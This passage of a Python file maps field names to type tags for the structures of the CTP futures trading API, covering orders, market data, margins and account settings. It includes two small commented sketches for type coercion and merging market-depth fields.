"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryBatchOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ExchangeID": "string",
}
CThostFtdcCombInstrumentGuardField = {
"BrokerID": "string",
"InstrumentID": "string",
"GuarantRatio": "double",
"ExchangeID": "string",
}
CThostFtdcQryCombInstrumentGuardField = {
"BrokerID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
}
CThostFtdcInputCombActionField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"CombActionRef": "string",
"UserID": "string",
"Direction": "char",
"Volume": "int",
"CombDirection": "char",
"HedgeFlag": "char",
"ExchangeID": "string",
"IPAddress": "string",
"MacAddress": "string",
"InvestUnitID": "string",
}
CThostFtdcCombActionField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"CombActionRef": "string",
"UserID": "string",
"Direction": "char",
"Volume": "int",
"CombDirection": "char",
"HedgeFlag": "char",
"ActionLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"ActionStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"SequenceNo": "int",
"FrontID": "int",
"SessionID": "int",
"UserProductInfo": "string",
"StatusMsg": "string",
"IPAddress": "string",
"MacAddress": "string",
"ComTradeID": "string",
"BranchID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryCombActionField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcExchangeCombActionField = {
"Direction": "char",
"Volume": "int",
"CombDirection": "char",
"HedgeFlag": "char",
"ActionLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"ActionStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"SequenceNo": "int",
"IPAddress": "string",
"MacAddress": "string",
"ComTradeID": "string",
"BranchID": "string",
}
CThostFtdcQryExchangeCombActionField = {
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"ExchangeID": "string",
"TraderID": "string",
}
CThostFtdcProductExchRateField = {
"ProductID": "string",
"QuoteCurrencyID": "string",
"ExchangeRate": "double",
"ExchangeID": "string",
}
CThostFtdcQryProductExchRateField = {
"ProductID": "string",
"ExchangeID": "string",
}
CThostFtdcQryForQuoteParamField = {
"BrokerID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
}
CThostFtdcForQuoteParamField = {
"BrokerID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"LastPrice": "double",
"PriceInterval": "double",
}
CThostFtdcMMOptionInstrCommRateField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"OpenRatioByMoney": "double",
"OpenRatioByVolume": "double",
"CloseRatioByMoney": "double",
"CloseRatioByVolume": "double",
"CloseTodayRatioByMoney": "double",
"CloseTodayRatioByVolume": "double",
"StrikeRatioByMoney": "double",
"StrikeRatioByVolume": "double",
}
CThostFtdcQryMMOptionInstrCommRateField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
}
CThostFtdcMMInstrumentCommissionRateField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"OpenRatioByMoney": "double",
"OpenRatioByVolume": "double",
"CloseRatioByMoney": "double",
"CloseRatioByVolume": "double",
"CloseTodayRatioByMoney": "double",
"CloseTodayRatioByVolume": "double",
}
CThostFtdcQryMMInstrumentCommissionRateField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
}
CThostFtdcInstrumentOrderCommRateField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"HedgeFlag": "char",
"OrderCommByVolume": "double",
"OrderActionCommByVolume": "double",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryInstrumentOrderCommRateField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
}
CThostFtdcTradeParamField = {
"BrokerID": "string",
"TradeParamID": "char",
"TradeParamValue": "string",
"Memo": "string",
}
CThostFtdcInstrumentMarginRateULField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"HedgeFlag": "char",
"LongMarginRatioByMoney": "double",
"LongMarginRatioByVolume": "double",
"ShortMarginRatioByMoney": "double",
"ShortMarginRatioByVolume": "double",
}
CThostFtdcFutureLimitPosiParamField = {
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"ProductID": "string",
"SpecOpenVolume": "int",
"ArbiOpenVolume": "int",
"OpenVolume": "int",
}
CThostFtdcLoginForbiddenIPField = {
"IPAddress": "string",
}
CThostFtdcIPListField = {
"IPAddress": "string",
"IsWhite": "int",
}
CThostFtdcInputOptionSelfCloseField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"OptionSelfCloseRef": "string",
"UserID": "string",
"Volume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"HedgeFlag": "char",
"OptSelfCloseFlag": "char",
"ExchangeID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"ClientID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcInputOptionSelfCloseActionField = {
"BrokerID": "string",
"InvestorID": "string",
"OptionSelfCloseActionRef": "int",
"OptionSelfCloseRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"OptionSelfCloseSysID": "string",
"ActionFlag": "char",
"UserID": "string",
"InstrumentID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcOptionSelfCloseField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"OptionSelfCloseRef": "string",
"UserID": "string",
"Volume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"HedgeFlag": "char",
"OptSelfCloseFlag": "char",
"OptionSelfCloseLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderSubmitStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"OptionSelfCloseSysID": "string",
"InsertDate": "string",
"InsertTime": "string",
"CancelTime": "string",
"ExecResult": "char",
"ClearingPartID": "string",
"SequenceNo": "int",
"FrontID": "int",
"SessionID": "int",
"UserProductInfo": "string",
"StatusMsg": "string",
"ActiveUserID": "string",
"BrokerOptionSelfCloseSeq": "int",
"BranchID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcOptionSelfCloseActionField = {
"BrokerID": "string",
"InvestorID": "string",
"OptionSelfCloseActionRef": "int",
"OptionSelfCloseRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"OptionSelfCloseSysID": "string",
"ActionFlag": "char",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"OptionSelfCloseLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"StatusMsg": "string",
"InstrumentID": "string",
"BranchID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryOptionSelfCloseField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"OptionSelfCloseSysID": "string",
"InsertTimeStart": "string",
"InsertTimeEnd": "string",
}
CThostFtdcExchangeOptionSelfCloseField = {
"Volume": "int",
"RequestID": "int",
"BusinessUnit": "string",
"HedgeFlag": "char",
"OptSelfCloseFlag": "char",
"OptionSelfCloseLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderSubmitStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"OptionSelfCloseSysID": "string",
"InsertDate": "string",
"InsertTime": "string",
"CancelTime": "string",
"ExecResult": "char",
"ClearingPartID": "string",
"SequenceNo": "int",
"BranchID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryOptionSelfCloseActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ExchangeID": "string",
}
CThostFtdcExchangeOptionSelfCloseActionField = {
"ExchangeID": "string",
"OptionSelfCloseSysID": "string",
"ActionFlag": "char",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"OptionSelfCloseLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"BranchID": "string",
"IPAddress": "string",
"MacAddress": "string",
"ExchangeInstID": "string",
"OptSelfCloseFlag": "char",
}
CThostFtdcSyncDelaySwapField = {
"DelaySwapSeqNo": "string",
"BrokerID": "string",
"InvestorID": "string",
"FromCurrencyID": "string",
"FromAmount": "double",
"FromFrozenSwap": "double",
"FromRemainSwap": "double",
"ToCurrencyID": "string",
"ToAmount": "double",
}
CThostFtdcQrySyncDelaySwapField = {
"BrokerID": "string",
"DelaySwapSeqNo": "string",
}
CThostFtdcInvestUnitField = {
"BrokerID": "string",
"InvestorID": "string",
"InvestUnitID": "string",
"InvestorUnitName": "string",
"InvestorGroupID": "string",
"CommModelID": "string",
"MarginModelID": "string",
"AccountID": "string",
"CurrencyID": "string",
}
CThostFtdcQryInvestUnitField = {
"BrokerID": "string",
"InvestorID": "string",
"InvestUnitID": "string",
}
CThostFtdcSecAgentCheckModeField = {
"InvestorID": "string",
"BrokerID": "string",
"CurrencyID": "string",
"BrokerSecAgentID": "string",
"CheckSelfAccount": "int",
}
CThostFtdcSecAgentTradeInfoField = {
"BrokerID": "string",
"BrokerSecAgentID": "string",
"InvestorID": "string",
"LongCustomerName": "string",
}
CThostFtdcMarketDataField = {
"TradingDay": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"ExchangeInstID": "string",
"LastPrice": "double",
"PreSettlementPrice": "double",
"PreClosePrice": "double",
"PreOpenInterest": "double",
"OpenPrice": "double",
"HighestPrice": "double",
"LowestPrice": "double",
"Volume": "int",
"Turnover": "double",
"OpenInterest": "double",
"ClosePrice": "double",
"SettlementPrice": "double",
"UpperLimitPrice": "double",
"LowerLimitPrice": "double",
"PreDelta": "double",
"CurrDelta": "double",
"UpdateTime": "string",
"UpdateMillisec": "int",
"ActionDay": "string",
}
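# --- usage sketch (assumption) -------------------------------------------------
# If a market-data record arrives with every value as text, the field map above
# can drive a simple coercion into native Python types. The cast table is a
# reasonable guess at a mapping and is not defined by the API itself.
_PY_CAST = {"int": int, "double": float, "char": str, "string": str}

def coerce_record(field_map, raw):
    """Cast the values of `raw` according to the type tags in `field_map`."""
    return {name: _PY_CAST.get(field_map[name], str)(value)
            for name, value in raw.items() if name in field_map}

# Example:
# tick = coerce_record(CThostFtdcMarketDataField,
#                      {"InstrumentID": "rb2010", "LastPrice": "3535.0", "Volume": "12"})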
CThostFtdcMarketDataBaseField = {
"TradingDay": "string",
"PreSettlementPrice": "double",
"PreClosePrice": "double",
"PreOpenInterest": "double",
"PreDelta": "double",
}
CThostFtdcMarketDataStaticField = {
"OpenPrice": "double",
"HighestPrice": "double",
"LowestPrice": "double",
"ClosePrice": "double",
"UpperLimitPrice": "double",
"LowerLimitPrice": "double",
"SettlementPrice": "double",
"CurrDelta": "double",
}
CThostFtdcMarketDataLastMatchField = {
"LastPrice": "double",
"Volume": "int",
"Turnover": "double",
"OpenInterest": "double",
}
CThostFtdcMarketDataBestPriceField = {
"BidPrice1": "double",
"BidVolume1": "int",
"AskPrice1": "double",
"AskVolume1": "int",
}
CThostFtdcMarketDataBid23Field = {
"BidPrice2": "double",
"BidVolume2": "int",
"BidPrice3": "double",
"BidVolume3": "int",
}
CThostFtdcMarketDataAsk23Field = {
"AskPrice2": "double",
"AskVolume2": "int",
"AskPrice3": "double",
"AskVolume3": "int",
}
CThostFtdcMarketDataBid45Field = {
"BidPrice4": "double",
"BidVolume4": "int",
"BidPrice5": "double",
"BidVolume5": "int",
}
CThostFtdcMarketDataAsk45Field = {
"AskPrice4": "double",
"AskVolume4": "int",
"AskPrice5": "double",
"AskVolume5": "int",
}
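# --- composition sketch (assumption) -------------------------------------------
# The Base / Static / LastMatch / BestPrice / Bid23 / Ask23 / Bid45 / Ask45
# dicts above look like slices of one depth snapshot. Merging them is only an
# illustration (the merged name below is hypothetical, not an official struct),
# but it yields a single field map covering all five price levels.
MergedDepthMarketDataFields = {
    **CThostFtdcMarketDataBaseField,
    **CThostFtdcMarketDataStaticField,
    **CThostFtdcMarketDataLastMatchField,
    **CThostFtdcMarketDataBestPriceField,
    **CThostFtdcMarketDataBid23Field,
    **CThostFtdcMarketDataAsk23Field,
    **CThostFtdcMarketDataBid45Field,
    **CThostFtdcMarketDataAsk45Field,
}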
CThostFtdcMarketDataUpdateTimeField = {
"InstrumentID": "string",
"UpdateTime": "string",
"UpdateMillisec": "int",
"ActionDay": "string",
}
CThostFtdcMarketDataExchangeField = {
"ExchangeID": "string",
}
CThostFtdcSpecificInstrumentField = {
"InstrumentID": "string",
}
CThostFtdcInstrumentStatusField = {
"ExchangeID": "string",
"ExchangeInstID": "string",
"SettlementGroupID": "string",
"InstrumentID": "string",
"InstrumentStatus": "char",
"TradingSegmentSN": "int",
"EnterTime": "string",
"EnterReason": "char",
}
CThostFtdcQryInstrumentStatusField = {
"ExchangeID": "string",
"ExchangeInstID": "string",
}
CThostFtdcInvestorAccountField = {
"BrokerID": "string",
"InvestorID": "string",
"AccountID": "string",
"CurrencyID": "string",
}
CThostFtdcPositionProfitAlgorithmField = {
"BrokerID": "string",
"AccountID": "string",
"Algorithm": "char",
"Memo": "string",
"CurrencyID": "string",
}
CThostFtdcDiscountField = {
"BrokerID": "string",
"InvestorRange": "char",
"InvestorID": "string",
"Discount": "double",
}
CThostFtdcQryTransferBankField = {
"BankID": "string",
"BankBrchID": "string",
}
CThostFtdcTransferBankField = {
"BankID": "string",
"BankBrchID": "string",
"BankName": "string",
"IsActive": "int",
}
CThostFtdcQryInvestorPositionDetailField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcInvestorPositionDetailField = {
"InstrumentID": "string",
"BrokerID": "string",
"InvestorID": "string",
"HedgeFlag": "char",
"Direction": "char",
"OpenDate": "string",
"TradeID": "string",
"Volume": "int",
"OpenPrice": "double",
"TradingDay": "string",
"SettlementID": "int",
"TradeType": "char",
"CombInstrumentID": "string",
"ExchangeID": "string",
"CloseProfitByDate": "double",
"CloseProfitByTrade": "double",
"PositionProfitByDate": "double",
"PositionProfitByTrade": "double",
"Margin": "double",
"ExchMargin": "double",
"MarginRateByMoney": "double",
"MarginRateByVolume": "double",
"LastSettlementPrice": "double",
"SettlementPrice": "double",
"CloseVolume": "int",
"CloseAmount": "double",
"InvestUnitID": "string",
}
CThostFtdcTradingAccountPasswordField = {
"BrokerID": "string",
"AccountID": "string",
"Password": "string",
"CurrencyID": "string",
}
CThostFtdcMDTraderOfferField = {
"ExchangeID": "string",
"TraderID": "string",
"ParticipantID": "string",
"Password": "string",
"InstallID": "int",
"OrderLocalID": "string",
"TraderConnectStatus": "char",
"ConnectRequestDate": "string",
"ConnectRequestTime": "string",
"LastReportDate": "string",
"LastReportTime": "string",
"ConnectDate": "string",
"ConnectTime": "string",
"StartDate": "string",
"StartTime": "string",
"TradingDay": "string",
"BrokerID": "string",
"MaxTradeID": "string",
"MaxOrderMessageReference": "string",
}
CThostFtdcQryMDTraderOfferField = {
"ExchangeID": "string",
"ParticipantID": "string",
"TraderID": "string",
}
CThostFtdcQryNoticeField = {
"BrokerID": "string",
}
CThostFtdcNoticeField = {
"BrokerID": "string",
"Content": "string",
"SequenceLabel": "string",
}
CThostFtdcUserRightField = {
"BrokerID": "string",
"UserID": "string",
"UserRightType": "char",
"IsForbidden": "int",
}
CThostFtdcQrySettlementInfoConfirmField = {
"BrokerID": "string",
"InvestorID": "string",
"AccountID": "string",
"CurrencyID": "string",
}
CThostFtdcLoadSettlementInfoField = {
"BrokerID": "string",
}
CThostFtdcBrokerWithdrawAlgorithmField = {
"BrokerID": "string",
"WithdrawAlgorithm": "char",
"UsingRatio": "double",
"IncludeCloseProfit": "char",
"AllWithoutTrade": "char",
"AvailIncludeCloseProfit": "char",
"IsBrokerUserEvent": "int",
"CurrencyID": "string",
"FundMortgageRatio": "double",
"BalanceAlgorithm": "char",
}
CThostFtdcTradingAccountPasswordUpdateV1Field = {
"BrokerID": "string",
"InvestorID": "string",
"OldPassword": "string",
"NewPassword": "string",
}
CThostFtdcTradingAccountPasswordUpdateField = {
"BrokerID": "string",
"AccountID": "string",
"OldPassword": "string",
"NewPassword": "string",
"CurrencyID": "string",
}
CThostFtdcQryCombinationLegField = {
"CombInstrumentID": "string",
"LegID": "int",
"LegInstrumentID": "string",
}
CThostFtdcQrySyncStatusField = {
"TradingDay": "string",
}
CThostFtdcCombinationLegField = {
"CombInstrumentID": "string",
"LegID": "int",
"LegInstrumentID": "string",
"Direction": "char",
"LegMultiple": "int",
"ImplyLevel": "int",
}
CThostFtdcSyncStatusField = {
"TradingDay": "string",
"DataSyncStatus": "char",
}
CThostFtdcQryLinkManField = {
"BrokerID": "string",
"InvestorID": "string",
}
CThostFtdcLinkManField = {
"BrokerID": "string",
"InvestorID": "string",
"PersonType": "char",
"IdentifiedCardType": "char",
"IdentifiedCardNo": "string",
"PersonName": "string",
"Telephone": "string",
"Address": "string",
"ZipCode": "string",
"Priority": "int",
"UOAZipCode": "string",
"PersonFullName": "string",
}
CThostFtdcQryBrokerUserEventField = {
"BrokerID": "string",
"UserID": "string",
"UserEventType": "char",
}
CThostFtdcBrokerUserEventField = {
"BrokerID": "string",
"UserID": "string",
"UserEventType": "char",
"EventSequenceNo": "int",
"EventDate": "string",
"EventTime": "string",
"UserEventInfo": "string",
"InvestorID": "string",
"InstrumentID": "string",
}
CThostFtdcQryContractBankField = {
"BrokerID": "string",
"BankID": "string",
"BankBrchID": "string",
}
CThostFtdcContractBankField = {
"BrokerID": "string",
"BankID": "string",
"BankBrchID": "string",
"BankName": "string",
}
CThostFtdcInvestorPositionCombineDetailField = {
"TradingDay": "string",
"OpenDate": "string",
"ExchangeID": "string",
"SettlementID": "int",
"BrokerID": "string",
"InvestorID": "string",
"ComTradeID": "string",
"TradeID": "string",
"InstrumentID": "string",
"HedgeFlag": "char",
"Direction": "char",
"TotalAmt": "int",
"Margin": "double",
"ExchMargin": "double",
"MarginRateByMoney": "double",
"MarginRateByVolume": "double",
"LegID": "int",
"LegMultiple": "int",
"CombInstrumentID": "string",
"TradeGroupID": "int",
"InvestUnitID": "string",
}
CThostFtdcParkedOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"OrderRef": "string",
"UserID": "string",
"OrderPriceType": "char",
"Direction": "char",
"CombOffsetFlag": "string",
"CombHedgeFlag": "string",
"LimitPrice": "double",
"VolumeTotalOriginal": "int",
"TimeCondition": "char",
"GTDDate": "string",
"VolumeCondition": "char",
"MinVolume": "int",
"ContingentCondition": "char",
"StopPrice": "double",
"ForceCloseReason": "char",
"IsAutoSuspend": "int",
"BusinessUnit": "string",
"RequestID": "int",
"UserForceClose": "int",
"ExchangeID": "string",
"ParkedOrderID": "string",
"UserType": "char",
"Status": "char",
"ErrorID": "int",
"ErrorMsg": "string",
"IsSwapOrder": "int",
"AccountID": "string",
"CurrencyID": "string",
"ClientID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcParkedOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"OrderActionRef": "int",
"OrderRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"OrderSysID": "string",
"ActionFlag": "char",
"LimitPrice": "double",
"VolumeChange": "int",
"UserID": "string",
"InstrumentID": "string",
"ParkedOrderActionID": "string",
"UserType": "char",
"Status": "char",
"ErrorID": "int",
"ErrorMsg": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryParkedOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryParkedOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcRemoveParkedOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"ParkedOrderID": "string",
"InvestUnitID": "string",
}
CThostFtdcRemoveParkedOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"ParkedOrderActionID": "string",
"InvestUnitID": "string",
}
CThostFtdcInvestorWithdrawAlgorithmField = {
"BrokerID": "string",
"InvestorRange": "char",
"InvestorID": "string",
"UsingRatio": "double",
"CurrencyID": "string",
"FundMortgageRatio": "double",
}
CThostFtdcQryInvestorPositionCombineDetailField = {
"BrokerID": "string",
"InvestorID": "string",
"CombInstrumentID": "string",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcMarketDataAveragePriceField = {
"AveragePrice": "double",
}
CThostFtdcVerifyInvestorPasswordField = {
"BrokerID": "string",
"InvestorID": "string",
"Password": "string",
}
CThostFtdcUserIPField = {
"BrokerID": "string",
"UserID": "string",
"IPAddress": "string",
"IPMask": "string",
"MacAddress": "string",
}
CThostFtdcTradingNoticeInfoField = {
"BrokerID": "string",
"InvestorID": "string",
"SendTime": "string",
"FieldContent": "string",
"SequenceSeries": "int",
"SequenceNo": "int",
"InvestUnitID": "string",
}
CThostFtdcTradingNoticeField = {
"BrokerID": "string",
"InvestorRange": "char",
"InvestorID": "string",
"SequenceSeries": "int",
"UserID": "string",
"SendTime": "string",
"SequenceNo": "int",
"FieldContent": "string",
"InvestUnitID": "string",
}
CThostFtdcQryTradingNoticeField = {
"BrokerID": "string",
"InvestorID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryErrOrderField = {
"BrokerID": "string",
"InvestorID": "string",
}
CThostFtdcErrOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"OrderRef": "string",
"UserID": "string",
"OrderPriceType": "char",
"Direction": "char",
"CombOffsetFlag": "string",
"CombHedgeFlag": "string",
"LimitPrice": "double",
"VolumeTotalOriginal": "int",
"TimeCondition": "char",
"GTDDate": "string",
"VolumeCondition": "char",
"MinVolume": "int",
"ContingentCondition": "char",
"StopPrice": "double",
"ForceCloseReason": "char",
"IsAutoSuspend": "int",
"BusinessUnit": "string",
"RequestID": "int",
"UserForceClose": "int",
"ErrorID": "int",
"ErrorMsg": "string",
"IsSwapOrder": "int",
"ExchangeID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"ClientID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcErrorConditionalOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"OrderRef": "string",
"UserID": "string",
"OrderPriceType": "char",
"Direction": "char",
"CombOffsetFlag": "string",
"CombHedgeFlag": "string",
"LimitPrice": "double",
"VolumeTotalOriginal": "int",
"TimeCondition": "char",
"GTDDate": "string",
"VolumeCondition": "char",
"MinVolume": "int",
"ContingentCondition": "char",
"StopPrice": "double",
"ForceCloseReason": "char",
"IsAutoSuspend": "int",
"BusinessUnit": "string",
"RequestID": "int",
"OrderLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderSubmitStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"OrderSysID": "string",
"OrderSource": "char",
"OrderStatus": "char",
"OrderType": "char",
"VolumeTraded": "int",
"VolumeTotal": "int",
"InsertDate": "string",
"InsertTime": "string",
"ActiveTime": "string",
"SuspendTime": "string",
"UpdateTime": "string",
"CancelTime": "string",
"ActiveTraderID": "string",
"ClearingPartID": "string",
"SequenceNo": "int",
"FrontID": "int",
"SessionID": "int",
"UserProductInfo": "string",
"StatusMsg": "string",
"UserForceClose": "int",
"ActiveUserID": "string",
"BrokerOrderSeq": "int",
"RelativeOrderSysID": "string",
"ZCETotalTradedVolume": "int",
"ErrorID": "int",
"ErrorMsg": "string",
"IsSwapOrder": "int",
"BranchID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcQryErrOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
}
CThostFtdcErrOrderActionField = {
"BrokerID": "string",
"InvestorID": "string",
"OrderActionRef": "int",
"OrderRef": "string",
"RequestID": "int",
"FrontID": "int",
"SessionID": "int",
"ExchangeID": "string",
"OrderSysID": "string",
"ActionFlag": "char",
"LimitPrice": "double",
"VolumeChange": "int",
"ActionDate": "string",
"ActionTime": "string",
"TraderID": "string",
"InstallID": "int",
"OrderLocalID": "string",
"ActionLocalID": "string",
"ParticipantID": "string",
"ClientID": "string",
"BusinessUnit": "string",
"OrderActionStatus": "char",
"UserID": "string",
"StatusMsg": "string",
"InstrumentID": "string",
"BranchID": "string",
"InvestUnitID": "string",
"IPAddress": "string",
"MacAddress": "string",
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcQryExchangeSequenceField = {
"ExchangeID": "string",
}
CThostFtdcExchangeSequenceField = {
"ExchangeID": "string",
"SequenceNo": "int",
"MarketStatus": "char",
}
CThostFtdcQueryMaxOrderVolumeWithPriceField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"Direction": "char",
"OffsetFlag": "char",
"HedgeFlag": "char",
"MaxVolume": "int",
"Price": "double",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryBrokerTradingParamsField = {
"BrokerID": "string",
"InvestorID": "string",
"CurrencyID": "string",
"AccountID": "string",
}
CThostFtdcBrokerTradingParamsField = {
"BrokerID": "string",
"InvestorID": "string",
"MarginPriceType": "char",
"Algorithm": "char",
"AvailIncludeCloseProfit": "char",
"CurrencyID": "string",
"OptionRoyaltyPriceType": "char",
"AccountID": "string",
}
CThostFtdcQryBrokerTradingAlgosField = {
"BrokerID": "string",
"ExchangeID": "string",
"InstrumentID": "string",
}
CThostFtdcBrokerTradingAlgosField = {
"BrokerID": "string",
"ExchangeID": "string",
"InstrumentID": "string",
"HandlePositionAlgoID": "char",
"FindMarginRateAlgoID": "char",
"HandleTradingAccountAlgoID": "char",
}
CThostFtdcQueryBrokerDepositField = {
"BrokerID": "string",
"ExchangeID": "string",
}
CThostFtdcBrokerDepositField = {
"TradingDay": "string",
"BrokerID": "string",
"ParticipantID": "string",
"ExchangeID": "string",
"PreBalance": "double",
"CurrMargin": "double",
"CloseProfit": "double",
"Balance": "double",
"Deposit": "double",
"Withdraw": "double",
"Available": "double",
"Reserve": "double",
"FrozenMargin": "double",
}
CThostFtdcQryCFMMCBrokerKeyField = {
"BrokerID": "string",
}
CThostFtdcCFMMCBrokerKeyField = {
"BrokerID": "string",
"ParticipantID": "string",
"CreateDate": "string",
"CreateTime": "string",
"KeyID": "int",
"CurrentKey": "string",
"KeyKind": "char",
}
CThostFtdcCFMMCTradingAccountKeyField = {
"BrokerID": "string",
"ParticipantID": "string",
"AccountID": "string",
"KeyID": "int",
"CurrentKey": "string",
}
CThostFtdcQryCFMMCTradingAccountKeyField = {
"BrokerID": "string",
"InvestorID": "string",
}
CThostFtdcBrokerUserOTPParamField = {
"BrokerID": "string",
"UserID": "string",
"OTPVendorsID": "string",
"SerialNumber": "string",
"AuthKey": "string",
"LastDrift": "int",
"LastSuccess": "int",
"OTPType": "char",
}
CThostFtdcManualSyncBrokerUserOTPField = {
"BrokerID": "string",
"UserID": "string",
"OTPType": "char",
"FirstOTP": "string",
"SecondOTP": "string",
}
CThostFtdcCommRateModelField = {
"BrokerID": "string",
"CommModelID": "string",
"CommModelName": "string",
}
CThostFtdcQryCommRateModelField = {
"BrokerID": "string",
"CommModelID": "string",
}
CThostFtdcMarginModelField = {
"BrokerID": "string",
"MarginModelID": "string",
"MarginModelName": "string",
}
CThostFtdcQryMarginModelField = {
"BrokerID": "string",
"MarginModelID": "string",
}
CThostFtdcEWarrantOffsetField = {
"TradingDay": "string",
"BrokerID": "string",
"InvestorID": "string",
"ExchangeID": "string",
"InstrumentID": "string",
"Direction": "char",
"HedgeFlag": "char",
"Volume": "int",
"InvestUnitID": "string",
}
CThostFtdcQryEWarrantOffsetField = {
"BrokerID": "string",
"InvestorID": "string",
"ExchangeID": "string",
"InstrumentID": "string",
"InvestUnitID": "string",
}
CThostFtdcQryInvestorProductGroupMarginField = {
"BrokerID": "string",
"InvestorID": "string",
"ProductGroupID": "string",
"HedgeFlag": "char",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcInvestorProductGroupMarginField = {
"ProductGroupID": "string",
"BrokerID": "string",
"InvestorID": "string",
"TradingDay": "string",
"SettlementID": "int",
"FrozenMargin": "double",
"LongFrozenMargin": "double",
"ShortFrozenMargin": "double",
"UseMargin": "double",
"LongUseMargin": "double",
"ShortUseMargin": "double",
"ExchMargin": "double",
